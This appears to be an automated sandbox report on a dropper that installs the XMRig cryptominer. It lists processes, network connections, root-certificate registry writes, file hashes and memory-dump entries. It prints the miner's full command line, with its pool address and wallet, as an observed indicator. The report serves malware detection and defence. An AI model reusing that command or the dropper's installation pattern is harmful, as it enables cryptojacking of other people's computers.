memory/2484-41-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-42-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-43-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-44-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-45-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-46-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-47-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-48-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-49-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-50-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-51-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-52-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-53-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-54-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-55-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-56-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-57-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-58-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-59-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-60-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-61-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-62-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-63-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-64-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-65-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-66-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-67-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-68-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-69-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-70-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-71-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-72-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-73-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-74-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-75-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-76-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-77-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-78-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-79-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-80-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-81-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-82-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-83-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
memory/2484-84-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2248 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2248 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/636-16-0x0000023597370000-0x0000023597390000-memory.dmp
memory/636-17-0x00000235973C0000-0x00000235973E0000-memory.dmp
memory/636-18-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-20-0x0000023597400000-0x0000023597420000-memory.dmp
memory/636-19-0x00000235973E0000-0x0000023597400000-memory.dmp
memory/636-21-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-22-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-23-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-25-0x0000023597400000-0x0000023597420000-memory.dmp
memory/636-24-0x00000235973E0000-0x0000023597400000-memory.dmp
memory/636-26-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-27-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-28-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-29-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-30-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-31-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-32-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-33-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-34-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-35-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-36-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-37-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-38-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-39-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-40-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-41-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-42-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-43-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-44-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-45-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-46-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-47-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-48-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-49-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-50-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-51-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-52-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-53-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-54-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-55-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-56-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-57-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-58-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-59-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-60-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-61-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-62-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-63-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-64-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-65-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-66-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-67-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-68-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-69-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-70-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-71-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-72-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-73-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-74-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-75-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-76-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-77-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-78-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-79-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-80-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-81-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-82-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-83-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
memory/636-84-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2740 wrote to memory of 536 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2740 wrote to memory of 536 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/536-16-0x0000019C3A050000-0x0000019C3A070000-memory.dmp
memory/536-17-0x0000019C3A0A0000-0x0000019C3A0C0000-memory.dmp
memory/536-18-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-20-0x0000019C3A0C0000-0x0000019C3A0E0000-memory.dmp
memory/536-19-0x0000019C3A0E0000-0x0000019C3A100000-memory.dmp
memory/536-21-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-22-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp
memory/536-25-0x0000019C3A0C0000-0x0000019C3A0E0000-memory.dmp
memory/536-24-0x0000019C3A0E0000-0x0000019C3A100000-memory.dmp
